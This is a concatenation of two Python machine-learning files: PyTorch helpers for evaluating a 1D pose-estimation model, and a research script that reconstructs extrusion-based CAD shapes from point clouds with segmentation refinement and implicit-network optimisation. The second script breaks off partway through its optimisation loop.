# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ======================================================================
from pdb import set_trace as keyboard
import torch
import numpy as np
import perf_eval.metrics
import time
#########################################################################
# get_timestamp()
#########################################################################
def get_timestamp():
t = time.localtime()
return '{0}-{1:02}-{2:02}_{3:02}-{4:02}-{5:02}'.format(t.tm_year,t.tm_mon,t.tm_mday,t.tm_hour,t.tm_min,t.tm_sec)
#########################################################################
# compute_and_viz_angular_error_metrics
#########################################################################
def compute_and_viz_angular_error_metrics(y_gt, y_est, par):
if par['mode'] == 'train_and_test_2_out':
y_gt = np.apply_along_axis(lambda x: np.arctan2(x[0], x[1]), 0, y_gt)
y_est = np.apply_along_axis(lambda x: np.arctan2(x[0], x[1]), 0, y_est)
o_err = perf_eval.metrics.angular_diff_1m_cos(y_gt, y_est)
h_counts, h_bins_e = perf_eval.metrics.viz_histogram(o_err, par)
return (h_counts, h_bins_e)
def plotLossEpochs(train_test_losses, train_test_errors, epoch_numbers, figure_file_name="MetricEpochCurve"):
#print(train_test_losses, train_test_errors, epoch_numbers)
import pandas as pd
train_loss = list(train_test_losses[0])
test_loss = list(train_test_losses[1])
train_errors = list(train_test_errors[0])
test_errors = list(train_test_errors[1])
dset = [[epoch_numbers, train_loss[i], test_loss[i]] for i in range(len(train_loss))]
df = pd.DataFrame(dset, columns=["Epochs", "Train Loss", "Test Loss"])
fig = df.plot(x="Epochs").get_figure()
#fig.show()
fig.savefig(f"{figure_file_name}_Losses.png", format="png")
# Errors
dset = [[epoch_numbers, train_errors[i], test_errors[i]] for i in range(len(train_errors))]
df = pd.DataFrame(dset, columns=["Epochs", "Train Error (RMSE)", "Test Error (RMSE)"])
fig = df.plot(x="Epochs").get_figure()
#fig.show()
fig.savefig(f"{figure_file_name}_Errors.png", format="png")
#########################################################################
# diff_1m_cos_loss
#########################################################################
class diff_1m_cos_loss(object):
def __init__(self, reduction=None):
self.reduction = reduction
def __call__(self, y_est, y_gt):
o_diff = 0.5 * (1 - torch.cos(y_est - y_gt))
loss = torch.sum(o_diff)
return loss
#########################################################################
# y_within_range
#########################################################################
def y_within_range(y, o_range):
mask_h = torch.lt(y, o_range[1])
mask_l = torch.gt(y, o_range[0])
mask = torch.logical_and(mask_h, mask_l)
return mask
#########################################################################
# Xform_select_in_y_range
#########################################################################
class Xform_select_in_y_range(torch.nn.Module):
"""
This class can be extended to be used with torchvision.transforms
However its use in data loader is slightly complicated by the fact that
the transform is applied to both the labels and the image. So in Dataset.__getitem__
Therefore, we'd need to handle both 'transform' and 'transform_label'
"""
def __init__(self, omega_range):
super().__init__()
self.omega_range = omega_range
def forward(self, y_gt, y_est, x=None):
y_mask = y_within_range(y_gt, self.omega_range)
y_est_m = None
x_m = None
if x is not None:
x_m = torch.index_select(x,0, torch.where(y_mask)[0])
if len(y_gt.shape) == 1:
y_gt_m = torch.masked_select(y_gt,y_mask)
else:
y_gt_m = torch.index_select(y_gt, 0, torch.where(y_mask)[0])
if y_est is not None:
# :TOREVIEW: can be simplified?
if len(y_est.shape) == 1: # regression for 1D pose
y_est_m = torch.masked_select(y_est,y_mask)
else: # shape-> (batch_dim, n_class)
y_est_m = torch.index_select(y_est, 0, torch.where(y_mask)[0])
return (y_gt_m, y_est_m, x_m)
def __repr__(self):
return self.__class__.__name__ + '(omega_range = {})'.format(self.omega_range)
#########################################################################
# perform_testing()
#########################################################################
def perform_testing(par, model, loss_func, device, loader, name):
"""
This function can be used inside of the trianing loop to monitor progress
"""
if not(par['instructor_version']) and loss_func is None:
print('perform_testing() returning early (since loss_func is None)')
return (0,*3*(None,))
omega_mask = Xform_select_in_y_range(par['omega_range'])
model.eval()
epoch_loss = 0
correct = 0
y_est_all = []
y_gt_all = []
with torch.no_grad():
n_samples = 0
for batch_idx, batch_data in enumerate(loader):
inst_id = batch_data['instance_id']
img = batch_data['image']
omega = batch_data['omega']
x = img
if not hasattr(model,'conv_feats'): # model is an MLP
x = x.flatten(1)
if par['mode'] == 'train_and_test_2_out':
y_omega_gt = torch.cat((torch.cos(omega), torch.sin(omega)), 1)
else:
y_omega_gt = omega
x = x.to(device)
y_omega_gt = y_omega_gt.to(device)
if par['regression_problem']:
y_gt = y_omega_gt
else: # testing for pose-class classification
y_gt = pose1D_to_pose_class_v2(y_omega_gt, par['class_proto'])
y_est = model(x)
if par['mode'] == 'train_and_test_2_out':
loss = loss_func(y_est, y_gt)
n_samples += y_gt.detach().numpy().shape[0]
else:
y_gt_m, y_est_m, x_m = omega_mask(y_gt, y_est, x)
n_samples += y_gt_m.shape[0]
loss = loss_func(y_est_m, y_gt_m)
if False:
if par['regression_problem']:
loss = loss_func(y_est_m, y_omega_gt_m)
else: # testing for pose-class classification
loss = loss_func(y_est_m, y_class_gt)
epoch_loss += loss.detach().item()
if not par['regression_problem']: # i.e., classification
y_est_m = y_est_m.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += y_est_m.eq(y_gt_m.view_as(y_est_m)).sum().item()
if par['mode'] == 'train_and_test_2_out':
y_gt_all.append(y_gt)
y_est_all.append(y_est)
pass
else:
for t_ in [(y_gt_all, y_gt_m), (y_est_all, y_est_m)]:
#t_[0].append(t_[1].cpu().detach().numpy())
t_[0].append(t_[1])
epoch_loss /= n_samples
acc = correct / n_samples
verbose = False # par['verbose_perform_testing']
if verbose:
print('{}: Average loss: {:.4f}'.format(
name, epoch_loss))
y_est_all = torch.cat(y_est_all)
if par['mode'] == 'train_and_test_2_out':
y_gt_all = torch.cat(y_gt_all)
else:
y_gt_all = torch.cat(y_gt_all).reshape(-1,1) # column vector
rmse_error = perf_eval.metrics.rmserror(y_est_all, y_gt_all, par['mode'])
return (epoch_loss, acc, y_est_all, y_gt_all, rmse_error)
|
nilq/baby-python
|
python
|
# Mikaela Uy (mikacuy@cs.stanford.edu)
import argparse
import os
import sys
import torch
import torch.nn as nn
import torch.nn.functional as F
import datetime
import time
import sys
import importlib
import shutil
import numpy as np
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR) # model
sys.path.append(os.path.join(BASE_DIR, '..','data_preprocessing'))
sys.path.append(os.path.join(BASE_DIR, 'models'))
## For implicit
sys.path.append(os.path.join(BASE_DIR, 'IGR'))
from sampler import *
from network import *
from general import *
from plots import plot_surface_2d
from chamferdist import ChamferDistance
chamferDist = ChamferDistance()
from global_variables import *
from utils import *
from data_utils import *
from dataloader import AutodeskDataset_h5_sketches
from losses import *
from sklearn.neighbors import NearestNeighbors
from sklearn.neighbors import KDTree
import pickle
import trimesh
### For extent clustering
from sklearn.cluster import DBSCAN
from sklearn import metrics
from plyfile import PlyData, PlyElement
MAX_NUM_INSTANCES = 8
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='data/')
# parser.add_argument('--model_id', type=str, default='115629_40d61053_0000_1')
# parser.add_argument('--model_id', type=str, default='126491_c931419a_0003_1')
# parser.add_argument('--model_id', type=str, default='111773_ab926952_0000_1')
parser.add_argument('--model_id', type=str, default='55838_a1513314_0000_1')
parser.add_argument('--data_split', type=str, default='test')
parser.add_argument('--out_fname', type=str, default='test_sdf.ply')
parser.add_argument('--dump_dir', default= "dump_visu/", type=str)
parser.add_argument('--num_points', type=int, default=2048)
### For marching cubes
parser.add_argument('--resolution', type=int, default=512)
parser.add_argument('--range', type=float, default=1.5)
parser.add_argument('--level', type=float, default=0.0)
### Load network
parser.add_argument('--model', type=str, default='pointnet_extrusion', help='model name')
parser.add_argument("--logdir", default="./results/Point2Cyl/", help="path to the log directory", type=str)
parser.add_argument("--ckpt", default="model.pth", help="checkpoint", type=str)
parser.add_argument('--K', type=int, default=8, help='Max number of extrusions')
parser.add_argument('--num_sk_point', type=int, default=1024, help='Point Number [default: 2048]')
parser.add_argument('--pred_seg', action='store_false')
parser.add_argument('--pred_normal', action='store_false')
parser.add_argument('--pred_bb', action='store_false')
parser.add_argument('--pred_extrusion', action='store_false')
parser.add_argument('--pred_op', action='store_true')
parser.add_argument('--norm_eig', action='store_true')
parser.add_argument('--use_whole_pc', action='store_true')
parser.add_argument('--use_extrusion_axis_feat', action='store_true')
##Pre-trained implicit network
### Sparse
parser.add_argument("--im_logdir", default="./results/IGR_sparse/", help="path to the log directory", type=str)
### Dense
# parser.add_argument("--im_logdir", default="./results/IGR_dense/", help="path to the log directory", type=str)
parser.add_argument("--im_ckpt", default="latest.pth", help="checkpoint", type=str)
##########
parser.add_argument('--use_gt_3d', action='store_true')
parser.add_argument('--with_direct_opt', action='store_true')
parser.add_argument('--separate', action='store_true')
parser.add_argument('--use_pretrained_2d', action='store_true')
### For post processing
parser.add_argument('--seg_post_process', action='store_true')
parser.add_argument('--scale_post_process', action='store_true')
parser.add_argument('--extent_post_process', action='store_true')
parser.add_argument('--igr_post_process', action='store_true')
parser.add_argument('--igr_post_process_reinit', action='store_true')
#### Automation based on order and operation
parser.add_argument('--design_option', type=int, default=1, help='Design option modes')
### Output folder to copy
parser.add_argument('--output_dir', default= "output_visu/", type=str)
# torch.manual_seed(10) ## bad
torch.manual_seed(1234)
# torch.manual_seed(0) ## good
np.random.seed(0)
FLAGS = parser.parse_args()
DESIGN_OPTION = FLAGS.design_option
if DESIGN_OPTION == 1:
ops = np.array([1, 1, 1, 1, 1, 1, 1, 1])
perm = np.array([0, 1, 2, 3, 4, 5, 6, 7])
elif DESIGN_OPTION == 2:
ops = np.array([-1, 1, 1])
perm = np.array([1, 0, 2])
elif DESIGN_OPTION == 3:
ops = np.array([-1, -1, 1, 1])
perm = np.array([2, 1, 0, 3])
elif DESIGN_OPTION == 4:
ops = np.array([1, -1, 1])
perm = np.array([0, 1, 2])
elif DESIGN_OPTION == 5:
ops = np.array([1, 1, -1])
perm = np.array([0,1,2])
DATA_SPLIT = FLAGS.data_split
DATA_DIR = FLAGS.data_dir
MODEL_ID = FLAGS.model_id
NUM_POINTS = FLAGS.num_points
OUT_FNAME = FLAGS.out_fname
DUMP_DIR = FLAGS.dump_dir
if not os.path.exists(DUMP_DIR): os.mkdir(DUMP_DIR)
temp_fol = os.path.join(DUMP_DIR, "tmp")
if not os.path.exists(temp_fol): os.mkdir(temp_fol)
plot_fol = os.path.join(DUMP_DIR, "plot")
if not os.path.exists(plot_fol): os.mkdir(plot_fol)
OUTPUT_DIR = FLAGS.output_dir
if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR)
recons_fol = os.path.join(OUTPUT_DIR, "reconstruction")
if not os.path.exists(recons_fol): os.mkdir(recons_fol)
pc_input_fol = os.path.join(OUTPUT_DIR, "input_point_clouds")
if not os.path.exists(pc_input_fol): os.mkdir(pc_input_fol)
intermediate_fol = os.path.join(OUTPUT_DIR, "intermediate_volumes")
if not os.path.exists(intermediate_fol): os.mkdir(intermediate_fol)
#### Visu for debugging
filename = "render.sh"
f = open(os.path.join(DUMP_DIR, filename), "w")
## To store the output image files
filename = "image_files.sh"
g = open(os.path.join(DUMP_DIR, filename), "w")
os.makedirs(os.path.join(DUMP_DIR, "point_cloud"), exist_ok=True)
os.makedirs(os.path.join(DUMP_DIR, "tmp"), exist_ok=True)
os.makedirs(os.path.join(DUMP_DIR, "rendering_point_cloud"), exist_ok=True)
#######
### Marching cubes
RES = FLAGS.resolution
RANGE = FLAGS.range
LEVEL = FLAGS.level
### Network
MODEL = FLAGS.model
LOG_DIR = FLAGS.logdir
CKPT = FLAGS.ckpt
K = FLAGS.K
NUM_SK_POINT = FLAGS.num_sk_point
PRED_SEG = FLAGS.pred_seg
PRED_NORMAL = FLAGS.pred_normal
PRED_EXT = FLAGS.pred_extrusion
PRED_BB = FLAGS.pred_bb
PRED_OP = FLAGS.pred_op
NORM_EIG = FLAGS.norm_eig
USE_WHOLE_PC = FLAGS.use_whole_pc
USE_EXTRUSION_AXIS_FEAT = FLAGS.use_extrusion_axis_feat
IM_LOGDIR = FLAGS.im_logdir
IM_CKPT = FLAGS.im_ckpt
USE_GT_3D = FLAGS.use_gt_3d
DIRECT_OPT = FLAGS.with_direct_opt
SEPARATE = FLAGS.separate
USE_PRETRAINED_2D = FLAGS.use_pretrained_2d
### For postprocess
SEG_PP = FLAGS.seg_post_process
SCALE_PP = FLAGS.scale_post_process
EXTENT_PP = FLAGS.extent_post_process
IGR_PP = FLAGS.igr_post_process
IGR_PP_INIT = FLAGS.igr_post_process_reinit
#######
### Load the geometry
# Individual model files
h5_file = h5_file = os.path.join(DATA_DIR+DATA_SPLIT, "h5", str(MODEL_ID)+'.h5')
point_cloud, normals, extrusion_labels, extrusion_axes, extrusion_distances,\
n_instances, vertices, faces, face_normals, face_to_ids, norm_factor, operation = get_model(h5_file, mesh_info=True, operation=True)
### For current sample
curr_pc = point_cloud
# curr_pc = curr_pc.astype(float)
curr_n_instances = n_instances[0]
print("Number of extrusion instances: "+str(curr_n_instances))
### Downsample depending on number of points ##
idx = np.arange(curr_pc.shape[0])
np.random.shuffle(idx)
curr_pc = curr_pc[idx[:NUM_POINTS]]
#### Save input point cloud too
#### Output the input depth point cloud
verts_tuple = np.zeros((NUM_POINTS,), dtype=[("x", "f4"), ("y", "f4"), ("z", "f4")])
for j in range(0, NUM_POINTS):
verts_tuple[j] = tuple(curr_pc[j, :])
el_verts = PlyElement.describe(verts_tuple, "vertex")
print(verts_tuple)
ply_filename_out = os.path.join(pc_input_fol, MODEL_ID+"_input.ply")
PlyData([el_verts], text=True).write(ply_filename_out)
#######
### Initialize and load network
device = torch.device('cuda')
MODEL_IMPORTED = importlib.import_module(MODEL)
pred_sizes = []
if PRED_NORMAL:
pred_sizes.append(3)
else:
pred_sizes.append(1) ##dummy DO NOT USE in prediction
if PRED_SEG and PRED_BB:
# 2K classes instead of K
pred_sizes.append(2*K)
elif PRED_SEG:
pred_sizes.append(K)
else:
pred_sizes.append(1) ##dummy DO NOT USE in prediction
model = MODEL_IMPORTED.backbone(output_sizes=pred_sizes)
GLOBAL_SIGMA = 1.8
LOCAL_SIGMA = 0.01
D_IN = 2
LATENT_SIZE = 256
sampler = NormalPerPoint(GLOBAL_SIGMA, LOCAL_SIGMA)
## Implicit
implicit_net = ImplicitNet(d_in=D_IN+LATENT_SIZE, dims = [ 512, 512, 512, 512, 512, 512, 512, 512 ], skip_in = [4], geometric_init= True, radius_init = 1, beta=100)
## PointNet
if not USE_WHOLE_PC:
pn_encoder = PointNetEncoder(LATENT_SIZE, D_IN, with_normals=True)
else:
if USE_EXTRUSION_AXIS_FEAT:
pn_encoder = PointNetEncoder(LATENT_SIZE, 7, with_normals=False) ## 3d pc plus confidence mask, plus extrusion axis
else:
pn_encoder = PointNetEncoder(LATENT_SIZE, 4, with_normals=False) ## 3d pc plus confidence mask, plus extrusion axis
fname = os.path.join(LOG_DIR, CKPT)
model.load_state_dict(torch.load(fname)["model"])
implicit_net.load_state_dict(torch.load(fname)["implicit_net"])
pn_encoder.load_state_dict(torch.load(fname)["pn_encoder"])
model.to(device)
implicit_net.to(device)
pn_encoder.to(device)
model.eval()
implicit_net.eval()
pn_encoder.eval()
print("Model loaded.")
## Loaded pre-trained sketch only encoder
IM_LOGDIR = FLAGS.im_logdir
IM_CKPT = FLAGS.im_ckpt
if USE_PRETRAINED_2D:
loaded_pn_encoder = PointNetEncoder(LATENT_SIZE, D_IN, with_normals=True)
loaded_pn_encoder.to(device)
fname = os.path.join(IM_LOGDIR, IM_CKPT)
implicit_net.load_state_dict(torch.load(fname)["model_state_dict"])
loaded_pn_encoder.load_state_dict(torch.load(fname)["encoder_state_dict"])
print("Pre-trained fixed implicit model loaded.")
loaded_pn_encoder.eval()
print()
##########
start_time = time.time()
#### Extrusion parameters
if USE_GT_3D:
print("Non-implemented for this type of loading...")
exit()
else:
with torch.no_grad():
gt_extrusion_labels = torch.from_numpy(extrusion_labels[idx[:NUM_POINTS]]).unsqueeze(0).to(device)
NUM_POINT = curr_pc.shape[0]
### Use network
curr_pc = torch.from_numpy(curr_pc).unsqueeze(0).to(device).to(torch.float)
# X, W_raw, O, _, _ = model(curr_pc)
X, W_raw = model(curr_pc)
X = F.normalize(X, p=2, dim=2, eps=1e-12)
W_2K = torch.softmax(W_raw, dim=2)
## 2K classes were predicted, create segmentation pred
# Barrel
W_barrel = W_2K[:, :, ::2]
# Base
W_base = W_2K[:, :, 1::2]
W = W_barrel + W_base
# Base or barrel segmentation
'''
0 for barrel
1 for base
'''
BB = torch.zeros(1, NUM_POINT, 2).to(device)
for j in range(K):
BB[:,:,0] += W_2K[:, :, j*2]
BB[:,:,1] += W_2K[:, :, j*2+1]
W_ = hard_W_encoding(W, to_null_mask=True)
matching_indices, mask = hungarian_matching(W_, gt_extrusion_labels, with_mask=True)
mask = mask.float()
## For visualization
W_reordered_unmasked = torch.gather(W_, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
W_reordered = torch.where((mask).unsqueeze(1).expand(1, NUM_POINT, K)==1, W_reordered_unmasked, torch.ones_like(W_reordered_unmasked)* -1.)
## Get original W probabilities
W_soft_reordered_unmasked = torch.gather(W, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
W_soft_reordered = torch.where((mask).unsqueeze(1).expand(1, NUM_POINT, K)==1, W_soft_reordered_unmasked, torch.ones_like(W_soft_reordered_unmasked)* -1.)
label = torch.argmax(W_reordered, dim=-1)
pred_bb_label = torch.argmax(BB, dim=-1)
EA_X = X
EA_W = W_reordered
W_barrel_reordered = torch.gather(W_barrel, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
W_base_reordered = torch.gather(W_base, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
E_AX = estimate_extrusion_axis(EA_X, W_barrel_reordered, W_base_reordered, label, pred_bb_label, normalize=NORM_EIG)
## Extrusion centers
## For center prediction
predicted_centroids = torch.zeros((1, curr_n_instances, 3)).to(device)
found_centers_mask = torch.zeros((1, curr_n_instances)).to(device)
## Calculate centroids of each segment
for j in range(curr_n_instances):
### Get points on the segment
curr_segment_W = EA_W[:, :, j]
indices_pred = curr_segment_W==1
indices_pred = indices_pred.nonzero()
for b in range(1):
## get indices in current point cloud
curr_batch_idx = indices_pred[:,0]==b
## No points found in segment (1 point found is considered no points to handle .squeeze() function)
if (curr_batch_idx.nonzero().shape[0]<=1):
found_centers_mask[b,j] = 0.0
continue
curr_batch_idx = curr_batch_idx.nonzero().squeeze()
curr_batch_pt_idx = indices_pred[:,1][curr_batch_idx]
curr_segment_pc = torch.gather(curr_pc[b,:,:], 0, curr_batch_pt_idx.unsqueeze(-1).repeat(1,3))
## Get center
pred_centroid = torch.mean(curr_segment_pc, axis=0)
predicted_centroids[b, j, :] = pred_centroid
found_centers_mask[b,j] = 1.0
extents, _ = get_extrusion_extents(curr_pc, label, pred_bb_label, E_AX[:,:curr_n_instances], predicted_centroids, num_points_to_sample=1024)
extents = extents.permute(1,0,2)
## Extrusion parameters
curr_pc = curr_pc.squeeze().to("cpu").detach().numpy()
curr_normal = X.squeeze().to("cpu").detach().numpy()
curr_extrusion_labels = label.squeeze().to("cpu").detach().numpy()
curr_bb_labels = pred_bb_label.squeeze().to("cpu").detach().numpy()
curr_extrusion_axes = E_AX.squeeze()[:curr_n_instances].to("cpu").detach().numpy()
curr_extrusion_centers = predicted_centroids.squeeze(0).to("cpu").detach().numpy()
curr_extrusion_extents = extents.squeeze().to("cpu").detach().numpy()
W_soft_reordered = W_soft_reordered.squeeze().to("cpu").detach().numpy()
####
######################################
######### Sketch extraction ###########
######################################
with torch.no_grad():
### Projection based on extrusion parameters for implicit net condition
projected_pc, projected_normal, pred_scales = sketch_implicit_projection(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(curr_normal).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_axes).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=NUM_SK_POINT)
projected_pc = projected_pc[:curr_n_instances]
projected_normal = projected_normal[:curr_n_instances]
pred_scales = pred_scales[:curr_n_instances]
pred_scales_repeated = pred_scales.unsqueeze(-1).unsqueeze(-1).repeat(1,1, projected_pc.shape[-2], projected_pc.shape[-1])
projected_pc /= pred_scales_repeated
projected_pc = projected_pc.reshape(-1, NUM_SK_POINT, 2)
projected_normal = projected_normal.reshape(-1, NUM_SK_POINT, 2)
global_pc = torch.cat((projected_pc, projected_normal), dim=-1)
if USE_PRETRAINED_2D:
latent_codes = loaded_pn_encoder(global_pc)
else:
latent_codes = pn_encoder(global_pc)
#####
latent_codes_init = latent_codes
######################################
### Marching cubes hyperparameters
resol = (RES,RES,RES)
ranges = ((-RANGE, RANGE), (-RANGE, RANGE), (-RANGE, RANGE))
level = LEVEL
eps = (ranges[0][1]-ranges[0][0]) / resol[0]
## Initialize volume
xy_flat = compute_grid2D(resol, ranges=ranges).unsqueeze(0).cuda()
z_dim = resol[2]
z_range = ranges[2][1] - ranges[2][0]
z_lin = np.linspace(ranges[2][0], ranges[2][1], z_dim, endpoint=False) + z_range / z_dim * 0.5
volume = torch.ones([resol[2], resol[1], resol[0]]).cuda() * -1.0
###########
######################################
##### Insert post-processing here ####
######################################
W_soft_reordered = W_soft_reordered[:, :curr_n_instances]
row_sums = W_soft_reordered.sum(axis=-1)
W_soft_reordered = W_soft_reordered / row_sums[:, np.newaxis]
### Check previous segmentation accuracy
acc = np.sum(curr_extrusion_labels==extrusion_labels[idx[:NUM_POINTS]])/curr_pc.shape[0]
print("Original accuracy: "+str(acc))
print()
###
### Hyperparameters
NEIGHBORHOOD_PERCENT = 0.02
UNCONFIDENT_PRED_LABEL = 0.6
CONSENSUS_THRESH_PERCENT = 0.8
RELABEL_THRESH_PERCENT = 0.7
NUM_ITERATIONS = 10
if SEG_PP:
## Get local neighborhood of each point in the point cloud
pc_nbrs = KDTree(curr_pc)
num_neighbors=int(curr_pc.shape[0] * NEIGHBORHOOD_PERCENT) ## let the local neighborhood be a proportion of the total number of points
distances, indices = pc_nbrs.query(curr_pc,k=num_neighbors)
indices_reshaped = np.reshape(indices, (-1))
### Do relabeling
extrusion_relabeled = []
consensus_threshold = num_neighbors * CONSENSUS_THRESH_PERCENT
relabel_threshold = num_neighbors * RELABEL_THRESH_PERCENT
prev_labels = np.copy(curr_extrusion_labels)
### Make labels (curr_n_instances) if the confidence is too low
prob_pred_label = np.max(W_soft_reordered, axis=-1)
indices_to_mask = prob_pred_label < UNCONFIDENT_PRED_LABEL
num_unknown_labels = np.sum(indices_to_mask)
print("Num unknown = "+str(num_unknown_labels))
### Mask label for unknown
prev_labels[indices_to_mask] = curr_n_instances
##### When a label as a disconnected component unlabel it
for i in range(curr_n_instances):
### Get points with label of a current instance
segment_idx = np.where(prev_labels == i)[0]
segment_points = curr_pc[segment_idx]
print(segment_points.shape)
if (segment_points.shape[0]==0):
continue
db = DBSCAN(eps=0.2, min_samples=20).fit(segment_points)
labels = db.labels_
# print(labels)
# exit()
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
print("Number of clusters for label " + str(i) + ": " + str(n_clusters_))
### Unlabel for -1
mask_idx = np.where(labels == -1)[0]
prev_labels[segment_idx[mask_idx]] = curr_n_instances
if n_clusters_ > 1:
### Find dominant segment
dominant_cluster = np.bincount(labels+1).argmax()
mask_idx = labels != (dominant_cluster-1)
prev_labels[segment_idx[mask_idx]] = curr_n_instances
##################
for j in range(NUM_ITERATIONS):
corresponding_labels = np.reshape(prev_labels[indices_reshaped], (curr_pc.shape[0], -1))
### Check for consensus in the neighborhood
hist = np.apply_along_axis(lambda x: np.bincount(x, minlength= (curr_n_instances+1)), axis=-1, arr=corresponding_labels)
extrusion_relabeled = []
for i in range(curr_pc.shape[0]):
### For unknown labeled points
if prev_labels[i] == curr_n_instances:
label_consensus = np.argmax(hist[i])
if label_consensus == curr_n_instances:
label_consensus = np.argsort(hist[i])
label_consensus = label_consensus[1]
extrusion_relabeled.append(label_consensus)
### For known labels
else:
### If current label agrees with most of the neighbors, continue
if hist[i][prev_labels[i]] > consensus_threshold:
extrusion_relabeled.append(prev_labels[i])
### Otherwise if there is a majority, relabel
else:
### Max in histogram
label_consensus = np.argsort(hist[i])
found = False
for j in range(curr_n_instances):
if hist[i][label_consensus[j]] > relabel_threshold:
extrusion_relabeled.append(label_consensus[j])
found = True
break
if not found:
extrusion_relabeled.append(prev_labels[i])
extrusion_relabeled = np.array(extrusion_relabeled)
prev_labels = extrusion_relabeled
acc = np.sum(extrusion_relabeled==extrusion_labels[idx[:NUM_POINTS]])/curr_pc.shape[0]
print("Refined accuracy: "+str(acc))
print()
visualize_segmentation_pc_bb_v2(MODEL_ID, DUMP_DIR, curr_pc, extrusion_labels[idx[:NUM_POINTS]], curr_extrusion_labels, curr_bb_labels, curr_bb_labels, f, g)
# visualize_segmentation_pc_bb_v2(MODEL_ID, DUMP_DIR, curr_pc, curr_extrusion_labels, extrusion_relabeled, curr_bb_labels, curr_bb_labels, f, g)
f.close()
g.close()
# exit()
else:
extrusion_relabeled = curr_extrusion_labels
if SCALE_PP:
### With RANSAC ###
with torch.no_grad():
### Projection based on extrusion parameters for implicit net condition
pred_scales_refined = scale_ransac(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(extrusion_relabeled).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_axes).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=NUM_SK_POINT)
pred_scales_refined = pred_scales_refined.squeeze().to("cpu").detach().numpy()
print(pred_scales_refined)
pred_scales = pred_scales_refined
#########################
if EXTENT_PP:
##### RANSAC for extent #####
extents, _ = extents_clustering(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(extrusion_relabeled).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
E_AX[:,:curr_n_instances], \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=2048)
curr_extrusion_extents = extents
print(curr_extrusion_extents)
############################
###### Render current sketches ########
for i in range(curr_n_instances):
# pnts = sketches[model_idx][i]
pnts = None
curr_latent = latent_codes_init[i]
plot_surface_2d(decoder=implicit_net,
path=plot_fol,
epoch=str(i),
shapename=MODEL_ID,
points=pnts,
latent=curr_latent,
resolution=512,mc_value=0.0,is_uniform_grid=True,verbose=False,save_html=False,save_ply=False,overwrite=True)
#######################################
######################################
######################################
######################################
if IGR_PP:
im_lr_schedules = get_learning_rate_schedules([{
"Type" : "Step",
"Initial" : 0.001,
# "Initial" : 0.0001,
"Interval" : 500,
"Factor" : 0.5
},
{
"Type" : "Step",
"Initial" : 0.001,
"Interval" : 1000,
"Factor" : 0.5
}])
im_weight_decay = 0
optimizer = torch.optim.Adam(
[ {
"params": implicit_net.parameters(),
"lr": im_lr_schedules[0].get_learning_rate(0),
"weight_decay": im_weight_decay
}
])
### Project the prediction
projected_pc, projected_normal, pred_scales = sketch_implicit_projection(torch.from_numpy(curr_pc).unsqueeze(0).to(device), \
torch.from_numpy(curr_normal).unsqueeze(0).to(device), \
# torch.from_numpy(curr_extrusion_labels).unsqueeze(0).to(device), \
torch.from_numpy(extrusion_relabeled).unsqueeze(0).to(device), \
torch.from_numpy(curr_bb_labels).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_axes).unsqueeze(0).to(device), \
torch.from_numpy(curr_extrusion_centers).unsqueeze(0).to(device), num_points_to_sample=NUM_SK_POINT)
with torch.no_grad():
pred_scales_repeated = pred_scales.unsqueeze(-1).unsqueeze(-1).repeat(1,1, projected_pc.shape[-2], projected_pc.shape[-1])
projected_pc /= pred_scales_repeated
projected_pc_ = projected_pc.reshape(-1, NUM_SK_POINT, 2)
projected_normal_ = projected_normal.reshape(-1, NUM_SK_POINT, 2)
global_pc = torch.cat((projected_pc_, projected_normal_), dim=-1)
if USE_PRETRAINED_2D:
latent_codes = loaded_pn_encoder(global_pc)
else:
latent_codes = pn_encoder(global_pc)
#####
latent_codes_init = latent_codes
### Loop through each extrusion segment and compose the volume
found = False
for i in range(curr_n_instances):
j = perm[i]
ax = curr_extrusion_axes[j]
c = curr_extrusion_centers[j]
extent = curr_extrusion_extents[j]
scale = pred_scales[j]
if np.abs(extent[0] - extent[1]) < 0.01:
print("Extrusion segment too shallow. Skipping.")
print()
continue
##### IGR Direct optimization
if IGR_PP:
if not IGR_PP_INIT:
### Always start with preloaded then directly optimize
fname = os.path.join(IM_LOGDIR, IM_CKPT)
implicit_net.load_state_dict(torch.load(fname)["model_state_dict"])
print("Loaded implcit net.")
else:
implicit_net = ImplicitNet(d_in=D_IN+LATENT_SIZE, dims = [ 512, 512, 512, 512, 512, 512, 512, 512 ], skip_in = [4], geometric_init= True, radius_init = 1, beta=100)
implicit_net.to(device)
implicit_net.train()
global_step = 0
curr_implicit_latent_code = latent_codes_init[j]
curr_implicit_latent_code = curr_implicit_latent_code.unsqueeze(0)
sk_pnts_orig = projected_pc[j]
sk_normals = projected_normal[j]
prev_lost = None
eps_lost = 1e-5
# eps_lost = 1e-7
# for it in range(1000):
for it in range(10000):
nonmnfld_pnts = sampler.get_points(sk_pnts_orig)
sk_pnts = add_latent(sk_pnts_orig, curr_implicit_latent_code)
nonmnfld_pnts = add_latent(nonmnfld_pnts, curr_implicit_latent_code)
# forward pass
